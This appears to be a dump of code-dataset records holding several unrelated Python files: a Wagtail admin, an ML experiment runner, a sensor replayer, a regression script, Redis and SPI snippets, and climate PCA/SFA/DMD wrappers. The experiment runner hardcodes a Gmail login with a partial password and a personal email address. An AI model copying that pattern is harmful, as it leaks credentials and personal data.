ModelAdminGroup,\n)\nfrom .models import Menu\nfrom django.contrib import admin\n\n\n\n\n\nclass MenusAdmin(ModelAdmin):\n model=Menu\n menu_label='Menus'\n menu_icon=\"placeholder\"\n menu_order=1\n add_to_settings_menu=False\n exclude_from_explorer=False\n list_display=(\"title\",\"slug\")\n search_fields=(\"title\",\"slug\")\n\nmodeladmin_register(MenusAdmin)\n\n", "sub_path": "menus/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 455, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wagtail.contrib.modeladmin.options.ModelAdmin", "line_number": 14, "usage_type": "name"}, {"api_name": "models.Menu", "line_number": 15, "usage_type": "name"}, {"api_name": "wagtail.contrib.modeladmin.options.modeladmin_register", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "292446674", "text": "import email\nimport smtplib\nimport time\nimport traceback\nimport sys\nimport argparse\n\nimport utilitary.config as config\nfrom utilitary.random_search import RandomSearch\nfrom parsers.Syntax import SyntaxReader\n\nclass Experiment():\n def __init__(self, exp_path, email, notif_all=False):\n print(\"init Experiment --> start\")\n self.exp_path = exp_path\n self.email = email\n self.notif_all = notif_all\n # Check the extension\n extension = self.exp_path.split(\".\")\n if(extension[-1] != \"exp\"):\n exception = \"The extension of the file must be '.exp'\"\n exception += \" and not '.\" + extension[-1] + \"'\"\n if self.notif_all:\n self.mail(\"Init fail\", exception)\n raise Exception(exception)\n\n # Parse the file\n self.parser = SyntaxReader(self.exp_path)\n self.parser.parse()\n\n # Get all experience.\n self.list_experience = self.parser.get_list_experience()\n for i, exp in enumerate(self.list_experience):\n self.__check_experiment(i, exp)\n self.__check_import(exp)\n # print(self.parser.list_experience)\n print(\"init Experiment --> end\")\n\n def start(self):\n for i, exp in enumerate(self.list_experience):\n print(exp[\"random_search\"])\n self.experiment_name = exp[\"name\"]\n self.loader = config.loader[exp[\"loader_name\"]]\n self.model = config.model[exp[\"model_name\"]]\n\n random_search_dict = exp[\"random_search\"]\n if random_search_dict[\"state\"]:\n self.random_search(i, exp, random_search_dict)\n else:\n self.one_experiment(i, exp)\n\n def random_search(self, i, exp, random_search_dict):\n del random_search_dict[\"state\"]\n model_number = random_search_dict[\"model_number\"]\n print(model_number)\n del random_search_dict[\"model_number\"]\n random_search_object = RandomSearch(**random_search_dict)\n for mn in range(model_number):\n parameter = random_search_object.get_parameter()\n print(\"====================================\")\n print(\"Set of random parameter\", parameter)\n print(\"====================================\")\n\n loader_parameter = exp[\"loader_parameter\"]\n dataset = self.loader(**loader_parameter)\n\n model_parameter = dict()\n # Maybe not vary all the parameters so put the defined value\n NN_randomize = parameter[\"NN_randomize\"]\n lin_output_size, lin_activation = NN_randomize\n model_parameter = exp[\"model_parameter\"]\n model_parameter[\"dataset\"] = dataset\n model_parameter[\"suffix\"] = dataset.suffix\n model_parameter[\"ES\"] = exp[\"early_stopping\"]\n model_parameter[\"num_layers\"] = parameter[\"num_layers\"]\n model_parameter[\"hidden_size\"] = parameter[\"hidden_size\"]\n model_parameter[\"lin_output_size\"] = lin_output_size\n model_parameter[\"lin_activation\"] = lin_activation\n # model_parameter[\"batch_size\"] = parameter[\"batch_size\"]\n\n model = self.model(**model_parameter)\n\n train_parameter = dict()\n train_parameter[\"optimizer\"] = exp[\"optimizer\"]\n train_parameter[\"lr\"] = parameter[\"lr\"]\n train_parameter[\"error\"] = exp[\"loss\"]\n train_parameter[\"epoch\"] = exp[\"epoch\"]\n\n model.set_train_parameter(**train_parameter)\n\n print(\"Training Experiment \"+str(i)+\"random number \"+str(mn)+\" \"+self.experiment_name+\" -> Start\")\n # 0.001\n model.train()\n print(\"Training Experiment \"+str(i)+\" \"+self.experiment_name+\" -> End\")\n\n print(\"before plot_losses\")\n model.plot_losses()\n print(\"after plot_losses\")\n # No need of exp[\"output_name\"] for now\n # But can be useful for improvement\n test_parameter = exp[\"output_parameter\"]\n result = model.test(**test_parameter)\n self.write_message(result, i, exp, train_parameter,\n model_parameter, model)\n\n\n def one_experiment(self, i, exp):\n loader_parameter = exp[\"loader_parameter\"]\n dataset = self.loader(**loader_parameter)\n\n model_parameter = exp[\"model_parameter\"]\n model_parameter[\"dataset\"] = dataset\n model_parameter[\"suffix\"] = dataset.suffix\n model_parameter[\"ES\"] = exp[\"early_stopping\"]\n # print(\"exp one_experiment func ES\", model_parameter[\"ES\"])\n\n model = self.model(**model_parameter)\n\n train_parameter = dict()\n train_parameter[\"optimizer\"] = exp[\"optimizer\"]\n train_parameter[\"lr\"] = exp[\"learning_rate\"]\n train_parameter[\"error\"] = exp[\"loss\"]\n train_parameter[\"epoch\"] = exp[\"epoch\"]\n\n model.set_train_parameter(**train_parameter)\n\n print(\"Training Experiment \"+str(i)+\" \"+self.experiment_name+\" -> Start\")\n # 0.001\n model.train()\n print(\"Training Experiment \"+str(i)+\" \"+self.experiment_name+\" -> End\")\n\n print(\"before plot_losses\")\n model.plot_losses()\n print(\"after plot_losses\")\n # No need of exp[\"output_name\"] for now\n # But can be useful for improvement\n test_parameter = exp[\"output_parameter\"]\n result = model.test(**test_parameter)\n self.write_message(result, i, exp, train_parameter,\n model_parameter, model)\n\n def write_message(self, result, i, exp, train_parameter,\n model_parameter, model):\n subject = \"Experiment \"+str(i)+\": END\"\n if result is None:\n result = \"\"\n message = self.experiment_name+\"\\n\"\n message += \"path to the result: \"+model.path_weights+\"\\n\"\n # message += \"\\t\\t\"+model.path_weights_ES+\"\\n\"\n message += \"model: \"+exp[\"model_name\"]+\"\\n\"\n message += \"model parameters: \"+str(model_parameter)+\"\\n\"\n message += \"seed: \"+str(model.data.seed)+\"\\n\"\n message += \"optimizer: \"+train_parameter[\"optimizer\"]+\"\\n\"\n message += \"learning_rate: \"+str(train_parameter[\"lr\"])+\"\\n\"\n message += \"error: \"+train_parameter[\"error\"]+\"\\n\"\n message += \"epoch: \"+str(train_parameter[\"epoch\"])+\"\\n\\n\\n\"\n message += result\n print(\"Experiment, model_parameter: \", exp[\"model_parameter\"])\n self.mail(subject, message)\n\n\n def __check_import(self, dict_experiment):\n error_message = \"ERROR EXPERIMENT: \"\n if(dict_experiment[\"model_name\"] not in config.model):\n error_message += \"The model '\"+dict_experiment[\"model_name\"]+\"'\"\n error_message += \" is not imported in 'config.py'.\\nYou must\"\n error_message += \" import it\"\n if self.notif_all:\n self.mail(\"[Fail] Import Model\", error_message)\n raise Exception(error_message)\n if(dict_experiment[\"loader_name\"] not in config.loader):\n error_message += \"The loader '\"+dict_experiment[\"loader_name\"]+\"'\"\n error_message += \" is not imported in 'config.py'.\\nYou must\"\n error_message += \" import it\"\n if self.notif_all:\n self.mail(\"[Fail] Import Loader\", error_message)\n raise Exception(error_message)\n\n def __check_experiment(self, num_experiment, dict_experiment):\n error_message = \"ERROR EXPERIMENT: \"\n if(\"model_name\" not in dict_experiment):\n error_message += \"You must precise a model name in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (model_name)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"model_parameter\" not in dict_experiment):\n error_message += \"You must precise model parameters in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (model_parameter)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"loader_name\" not in dict_experiment):\n error_message += \"You must precise a loader name in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (loader_name)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"loader_parameter\" not in dict_experiment):\n error_message += \"You must precise loader parameters in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (loader_parameter)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"loss\" not in dict_experiment):\n error_message += \"You must precise a loss function in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (loss)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n # if(\"input\" not in dict_experiment):\n # error_message += \"You must precise an input path in experiment \"\n # error_message += str(num_experiment+1)\n # raise(Exception(error_message))\n if(\"optimizer\" not in dict_experiment):\n error_message += \"You must precise an optimizer in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (optimizer)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n\n def __key_format(self, key):\n if(key == \"model_name\"):\n return \"Model: \"\n if(key == \"loader_name\"):\n return \"Loader: \"\n if(key == \"dataset_split\"):\n return \"Dataset split: \"\n if(key == \"loss\"):\n return \"Loss: \"\n if(key == \"learning_rate\"):\n return \"Learning rate: \"\n if(key == \"input\"):\n return \"Input: \"\n if(key == \"output\"):\n return \"Output: \"\n if(key == \"early_stopping\"):\n return \"Early stopping: \"\n if(key == \"cross_validation\"):\n return \"Cross validation: \"\n if(key == \"epoch\"):\n return \"Epoch: \"\n if(key == \"model_parameter\"):\n return \"Model parameters: \"\n if(key == \"loader_parameter\"):\n return \"Loader parameters: \"\n if(key == \"optimizer\"):\n return \"Optimizer: \"\n raise(Exception(\"ERROR DISPLAY: Format of key '\"+key+\"' not define\"))\n\n def __str__(self):\n string = \"\"\n for i, exp in enumerate(self.list_experience):\n string += \"Experience \" + str(i+1) + \"\\n\"\n for key in exp:\n string += \"\\t\"+ self.__key_format(key) + str(exp[key]) + \"\\n\"\n\n return string\n\n def mail(self, subject, message):\n try:\n msg = email.message_from_string(message)\n msg['From'] = \"cluster.sna@gmail.com\"\n msg['To'] = self.email\n msg['Subject'] = subject\n\n s = smtplib.SMTP('smtp.gmail.com',587)\n # Identify yourself to an ESMTP server using EHLO.\n s.ehlo()\n # Put the SMTP connection in TLS (Transport Layer Security) mode.\n s.starttls()\n\n # If send a traceback \"\\u0301\" may occur. We must remove it\n # because we must have only ascii character\n msg = msg.as_string()\n msg = msg.replace(\"\\u0301\", \"'\")\n s.login('cluster.sna@gmail.com', '----ecg19')\n s.sendmail('cluster.sna@gmail.com', self.email, msg)\n s.quit()\n except:\n print(\"Can not send the mail\")\n print(traceback.format_exc())\n\nif __name__ == \"__main__\":\n try:\n # Parse argument\n parser = argparse.ArgumentParser(description='Process Experiment')\n parser.add_argument('name_file', metavar='name_file', type=str,\n help='Name of the file where your experiment is describe')\n args = parser.parse_args()\n name_file = args.name_file\n\n start = None\n exp = Experiment(name_file, 'eric.guillaume.vidot@hotmail.fr')\n start = time.time()\n exp.start()\n end = time.time()\n duration = end - start\n duration = time.gmtime(duration)\n subject = \"END COMPUTATION\"\n message = str(duration.tm_hour)+\" hour \"+str(duration.tm_min)+\" min \"\n message += str(duration.tm_sec)+\" sec.\"\n exp.mail(subject, message)\n except:\n subject = \"FAIL EXPERIMENT\"\n if start is not None:\n end = time.time()\n duration = end - start\n duration = time.gmtime(duration)\n\n message = str(duration.tm_hour)+\" hour \"+str(duration.tm_min)+\" min \"\n message += str(duration.tm_sec)+\" sec.\\n\\n\\n\"\n message += traceback.format_exc()\n exp.mail(subject, message)\n raise\n # print(exp)\n", "sub_path": "Experiment.py", "file_name": "Experiment.py", "file_ext": "py", "file_size_in_byte": 13628, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "parsers.Syntax.SyntaxReader", "line_number": 28, "usage_type": "call"}, {"api_name": "utilitary.config.loader", "line_number": 43, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 43, "usage_type": "name"}, {"api_name": "utilitary.config.model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 44, "usage_type": "name"}, {"api_name": "utilitary.random_search.RandomSearch", "line_number": 57, "usage_type": "call"}, {"api_name": "utilitary.config.model", "line_number": 164, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 164, "usage_type": "name"}, {"api_name": "utilitary.config.loader", "line_number": 171, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 171, "usage_type": "name"}, {"api_name": "email.message_from_string", "line_number": 274, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 279, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 294, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 299, "usage_type": "call"}, {"api_name": "time.time", "line_number": 307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 309, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 311, "usage_type": "call"}, {"api_name": "time.time", "line_number": 319, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 321, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "557612748", "text": "import logging\nimport json\nimport time\n\nlogger = logging.getLogger(__name__)\n\nfrom experiment_file import ExperimentFile\n\n\nclass MeasurementsPlayer(object):\n\n def __init__(self, data_file, callback):\n self.data_file = data_file\n self.callback = callback\n self.experiment_file = ExperimentFile(self.data_file)\n\n def play(self):\n playback_start = int(time.time())\n measurement_start = None\n\n logger.info('Start replaying file')\n nb_messages = 0\n for measurement in self.experiment_file.open_for_reading():\n if not measurement_start:\n measurement_start = measurement['created_at']\n\n logger.info('Sending a message %s' % measurement['sensor_id'])\n nb_messages += 1\n playback_delta = int(time.time()) - playback_start\n measurement_delta = measurement['created_at'] - measurement_start\n\n if playback_delta < measurement_delta:\n # Sleep in order to wait for the correct time to play\n # back this measurement.\n logger.info('sleeping %d' % (measurement_delta - playback_delta))\n time.sleep((measurement_delta - playback_delta) / 1000000.0)\n \"\"\"\n else:\n # Skip this measurement because we're behind\n continue\n \"\"\"\n\n self.callback(json.dumps(measurement))\n\n logger.info('Done replaying file with %s messages', nb_messages)\n\n self.experiment_file.close()\n\n", "sub_path": "core/measurements_player.py", "file_name": "measurements_player.py", "file_ext": "py", "file_size_in_byte": 1539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "experiment_file.ExperimentFile", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "180420761", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('salary.csv', na_values = ['',' '])\nX = df['workedYears'].values.reshape(-1,1)\ny = df['salaryBrutto'].values.reshape(-1,1)\ndf.fillna(0, inplace=True)\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=0)\nX_train = X[:47]\nX_test = X[47:]\ny_train = y[:47]\ny_test = y[47:59]\n\nfrom sklearn.linear_model import LinearRegression\nlm = LinearRegression()\nlm.fit(X_train, y_train)\nlm.predict(X_test)\n\npredicted_salary = lm.predict(X_test)\nlistsalary = predicted_salary.round(2).tolist()\nyears_to_predict = X_test.tolist()\n\nfor i in range(len(listsalary)):\n print(\"For %s years of experience, predicted salary will be %s.\" % (*years_to_predict[i], *listsalary[i]))\n\nplt.xlabel('Worked years')\nplt.ylabel('Predicted salary brutto')\nplt.plot(X_test, predicted_salary, marker=\"o\", markerfacecolor=\"red\")\nplt.show()", "sub_path": "Cognitive_Patronage2019_Task1.py", "file_name": "Cognitive_Patronage2019_Task1.py", "file_ext": "py", "file_size_in_byte": 982, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "356353998", "text": "import pandas\nimport numpy\nimport statsmodels.api as sm\n\ndef parse_data_set(filepath):\n df=pandas.read_excel(filepath)\n df['Lat']=df['Lat'].str.replace('(\\d+)w','-\\\\1',regex=True)\n df['Lat'] = df['Lat'].str.replace('(\\d+)e', '\\\\1', regex=True)\n df['Lat']=df['Lat'].astype(int)\n df['Lon']=df['Lon'].str.replace('(\\d+)s','-\\\\1',regex=True)\n df['Lon'] = df['Lon'].str.replace('(\\d+)n', '\\\\1', regex=True)\n df['Lon']=df['Lon'].astype(int)\n df['HHMMSS']=df['HHMMSS']//10000*3600+df['HHMMSS']%10000/100*60+df['HHMMSS']%10000%100\n df=df.drop(labels=['HHMMSS','Lat','Lon'],axis=1)\n # df = df.drop(labels=['HHMMSS', 'YYYYMMDD', 'Lat', 'Lon'], axis=1)\n return df\n\ndef looper(limit,data):\n cols = ['x1', 'x2', 'x3', 'x5', 'x6', 'x7', 'x8', 'x9','x10','x11']\n for i in range(len(cols)):\n data1 = data[cols]\n x = sm.add_constant(data1) #生成自变量\n y = data['WSPD'] #生成因变量\n model = sm.OLS(y, x) #生成模型\n result = model.fit() #模型拟合\n pvalues = result.pvalues #得到结果中所有P值\n pvalues.drop('const',inplace=True) #把const取得\n pmax = max(pvalues) #选出最大的P值\n if pmax>limit:\n ind = pvalues.idxmax() #找出最大P值的index\n cols.remove(ind) #把这个index从cols中删除\n else:\n return result\n\n\n\ndata=parse_data_set(filepath='H:/guan.多元回归/test.xlsx')\nprint(data)\ndata.columns=['WSPD','x1', 'x2', 'x3','x4' ,'x5', 'x6', 'x7', 'x8', 'x9','x10','x11']\n# x=numpy.array(data.iloc[:,1:])\n# x = sm.add_constant(x) #生成自变量\n# y = numpy.array(data['WSPD']) #生成因变量\n\nresult = looper(0.05,data)\n\nprint(result.summary()) #模型描述", "sub_path": "job-json,xml,csv/guan.多元回归/多元回归.py", "file_name": "多元回归.py", "file_ext": "py", "file_size_in_byte": 1728, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_excel", "line_number": 6, "usage_type": "call"}, {"api_name": "statsmodels.api.add_constant", "line_number": 22, "usage_type": "call"}, {"api_name": "statsmodels.api", "line_number": 22, "usage_type": "name"}, {"api_name": "statsmodels.api.OLS", "line_number": 24, "usage_type": "call"}, {"api_name": "statsmodels.api", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "340959711", "text": "import redis\nimport json \nimport time\nimport os\n\nrds = redis.from_url(os.environ.get(\"REDIS_URL\",\"redis://localhost:6379\"))\n\nkey = \"user:0:shedule\"\n\nshedule = rds.get(key)\nif type(shedule) is bytes: shedule = shedule.decode('utf-8')\nif shedule: shedule = json.loads(shedule)\nshedule = shedule or {}\n\n\ncur_date = time.strftime(\"%d.%m.%Y\")\ncur_time = time.localtime()\n\nflag = False\nfor i, event in enumerate(shedule[cur_date]):\n\tevent_time = time.strptime(event[\"time\"], \"%H:%M\")\n\tif event_time.tm_hour <= cur_time.tm_hour and event_time.tm_min <= cur_time.tm_min: \n\t\tif not flag: shedule[cur_date][i][\"type\"] = 1\n\t\telse: shedule[cur_date][i][\"type\"] = 2\n\t\tflag = True\n\telse: shedule[cur_date][i][\"type\"] = 0\n\nshedule = json.dumps(shedule)\nrds.set(key, shedule)\n\n", "sub_path": "scripts/shedule.py", "file_name": "shedule.py", "file_ext": "py", "file_size_in_byte": 761, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "redis.from_url", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 21, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "586863378", "text": "import spidev\nimport time\n\nusleep = lambda x : time.sleep(x/1000000.0)\n\nspi = spidev.SpiDev()\nspi.open(0, 1)\nspi.max_speed_hz = 2000000\n\nwhile True:\n resp = spi.xfer2([0x00]) \n #print(resp[0])\n usleep(1.0)\n\nspi.close()\n", "sub_path": "spi_test.py", "file_name": "spi_test.py", "file_ext": "py", "file_size_in_byte": 231, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "time.sleep", "line_number": 4, "usage_type": "call"}, {"api_name": "spidev.SpiDev", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "636734201", "text": "from Qt import QtWidgets, QtCore\nimport sys\nimport collections\n\nclass EditPropertiesTreeWidget(QtWidgets.QTreeWidget):\n def __init__(self):\n super(EditPropertiesTreeWidget, self).__init__()\n self.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)\n self.setHeaderHidden(True)\n\n def addFolder(self, name, parent=None):\n icon = self.style().standardIcon(QtWidgets.QStyle.SP_DirIcon)\n item = QtWidgets.QTreeWidgetItem([name])\n item.setIcon(0, icon)\n item.isFolder = True\n if parent is None:\n self.addTopLevelItem(item)\n else:\n parent.addChild(item)\n return item\n\n def addNormal(self, name, parent=None):\n item = QtWidgets.QTreeWidgetItem([name])\n item.setFlags(item.flags() & ~QtCore.Qt.ItemIsDropEnabled)\n item.isFolder = False\n if parent is not None:\n parent.addChild(item)\n else:\n self.addTopLevelItem(item)\n return item\n\n def fill_dict_from_model(self, parent_index, d, model):\n v = collections.OrderedDict()\n for i in range(model.rowCount(parent_index)):\n ix = model.index(i, 0, parent_index)\n self.fill_dict_from_model(ix, v, model)\n if len(v) == 0:\n v = None\n d[parent_index.data()] = v\n\n def model_to_dict(self):\n model = self.model()\n d = collections.OrderedDict()\n for i in range(model.rowCount()):\n ix = model.index(i, 0)\n self.fill_dict_from_model(ix, d, model)\n return d\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n form = EditPropertiesTreeWidget()\n form.addNormal(\"Normal\")\n form.addNormal(\"Normal1\")\n form.addFolder(\"Folder\")\n form.addFolder(\"Folder1\")\n form.show()\n\n app.exec_()\n", "sub_path": "PyFlow/UI/Widgets/EditPropertiesWidget.py", "file_name": "EditPropertiesWidget.py", "file_ext": "py", "file_size_in_byte": 1830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "Qt.QtWidgets.QTreeWidget", "line_number": 5, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets", "line_number": 5, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QAbstractItemView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets", "line_number": 8, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QStyle", "line_number": 12, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets", "line_number": 12, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QTreeWidgetItem", "line_number": 13, "usage_type": "call"}, {"api_name": "Qt.QtWidgets", "line_number": 13, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QTreeWidgetItem", "line_number": 23, "usage_type": "call"}, {"api_name": "Qt.QtWidgets", "line_number": 23, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 24, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 43, "usage_type": "call"}, {"api_name": "Qt.QtWidgets.QApplication", "line_number": 51, "usage_type": "call"}, {"api_name": "Qt.QtWidgets", "line_number": 51, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "247680035", "text": "import numpy as np\nimport pandas as pd\nimport xarray as xr\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as mpl_cm\nimport cartopy.crs as ccrs\nimport seaborn as sns\nimport cmocean\n\nfrom scipy import signal\nfrom scipy.stats import pearsonr\n\nimport pyclimine as pcm\n\nfrom matplotlib import gridspec\n\n#############################\n# WRAPPED MODELS\n#############################\n \nclass wrapped_pca(object):\n def __init__(self, n_components, **kwargs):\n self._model_modes = n_components\n \n # model specific imports\n from sklearn.decomposition import PCA\n \n self.model = PCA(n_components = n_components, **kwargs)\n\n @property\n def model_modes(self):\n return self._model_modes\n \n def train_model(self, X_train):\n self.model_series = self.model.fit_transform(X_train)\n \n def retrieve_model_modes(self):\n return self.model.components_\n \n def model_project_modes(self, N=None):\n if N is None:\n N = len(self.model_series)\n return self.model_series[:N].T[..., np.newaxis] * self.model.components_[:, np.newaxis, :]\n \n def model_flatten_modes(self):\n return np.matmul(self.model_series, self.model.components_)\n \n def model_mode_snaps(self, latslen, lonslen):\n return self.model.components_.reshape((self.model_modes, \n latslen, \n lonslen))\n def decompose_data(self, X):\n series = self.model.transform(X)\n return series.T[..., np.newaxis] * self.model.components_[:, np.newaxis, :]\n \n def mode_info(self, n):\n return 'Mode {} | var : {:.3f}'.format(n, self.model.explained_variance_ratio_[n])\n \n\nclass wrapped_sfa(object):\n def __init__(self, n_components, pca_components=None, **kwargs):\n self._model_modes = n_components\n if pca_components is None: pca_components=2*n_components\n self._model_modes = n_components\n \n # model specific imports\n from mdp.nodes import SFANode, PCANode\n \n self.model = PCANode(output_dim=pca_components) + SFANode(output_dim=n_components, **kwargs)\n\n @property\n def model_modes(self):\n return self._model_modes\n \n @staticmethod\n def one_hot_column(x, n):\n y = np.zeros(x.shape)\n y[:,n]=x[:,n]\n return y\n \n def train_model(self, X_train):\n self.model.train(X_train)\n self.model_series = self.model.execute(X_train)\n \n def retrieve_model_modes(self):\n \n def one_hot(n,N):\n x = np.zeros(N)\n x[n]=1\n return x\n \n return self.model.inverse(np.array([one_hot(n,self.model_modes) \n for n in range(self.model_modes)]))\n \n def model_project_modes(self, N=None):\n if N is None:\n N = len(self.model_series)\n return np.array([self.model.inverse(self.one_hot_column(self.model_series[:N], n)) \n for n in range(self.model_modes)])\n \n def model_flatten_modes(self):\n return self.model.inverse(self.model_series)\n \n def model_mode_snaps(self, latslen, lonslen):\n return self.retrieve_model_modes().reshape((self.model_modes, \n latslen, \n lonslen))\n \n def decompose_data(self, X):\n series = self.model.execute(X)\n return np.array([self.model.inverse(self.one_hot_column(series, n)) \n for n in range(self.model_modes)])\n \n def mode_info(self, n):\n return 'Mode {} | delta eig : {:.3f}'.format(n, self.model[1].d[n])\n\n \n \nclass wrapped_dmd(object):\n def __init__(self, n_components, **kwargs):\n self._model_modes = n_components\n \n # model specific imports\n from pydmd import DMD\n\n self.model = DMD(svd_rank=n_components, opt=False, exact=False, **kwargs)\n\n @property\n def model_modes(self):\n return self._model_modes\n \n def train_model(self, X_train):\n self.model.fit(X_train.T)\n # calculate latent variable time series\n self.model_series = np.zeros((X_train.shape[0], self.model_modes))\n for i in range(X_train.shape[0]):\n self.model_series[i] = self.model._compute_amplitudes(self.model.modes, \n X_train[i:i+1].T, \n self.model.eigs, \n False)\n \n def retrieve_model_modes(self):\n return self.model.modes.T.real\n \n def model_project_modes(self, N=None):\n if N is None:\n N = len(self.model_series)\n return np.real(self.model.modes.T[:,np.newaxis,:] * \\\n self.model_series[:N].T[:,:,np.newaxis])\n \n def model_flatten_modes(self):\n return np.real(np.matmul(self.model.modes, self.model_series.T).T)\n \n def model_mode_snaps(self, latslen, lonslen):\n return self.retrieve_model_modes().reshape((self.model_modes, \n latslen, \n lonslen))\n def decompose_data(self,X):\n series = np.zeros((X.shape[0], self.model_modes))\n for i in range(X.shape[0]):\n series[i] = self.model._compute_amplitudes(self.model.modes, \n X[i:i+1].T, \n self.model.eigs, \n False)\n return np.real(self.model.modes.T[:,np.newaxis,:] * \\\n series.T[:,:,np.newaxis])\n \n def mode_info(self, n):\n return 'Mode {} | A eig : {:.3f}'.format(n, self.model.eigs[n])\n\n###################################################\n# MULTIMODEL COMPILER\n###################################################\n\n\ndef zeros_line(i,N,n):\n x = np.zeros((N,n), dtype=bool)\n x[:,i] = True\n return x\n\ndef not_match_not_nan(x,y):\n return (~np.isnan(x))&(~np.isnan(y))&(x!=y)\n\ndef sortnan(a, fill=-999):\n return fill if np.isnan(a) else a\n\ndef non_nan(x):\n return x[~np.isnan(x)]\n\ndef nd_argmax(X):\n return np.unravel_index(np.nanargmax(X), X.shape)\n\ndef normalise_fields(data):\n d = np.zeros(data.shape[:2])\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n d[i,j]=np.nansum(data[i,j]**2)\n d[d==0]=1\n data=data/(d[:,:,np.newaxis, np.newaxis]**0.5)\n return data\n\nclass multi_model_application:\n def __init__(self, X_train, lats, lons, wrapped_models):\n self.X_train = X_train\n self.lats = lats\n 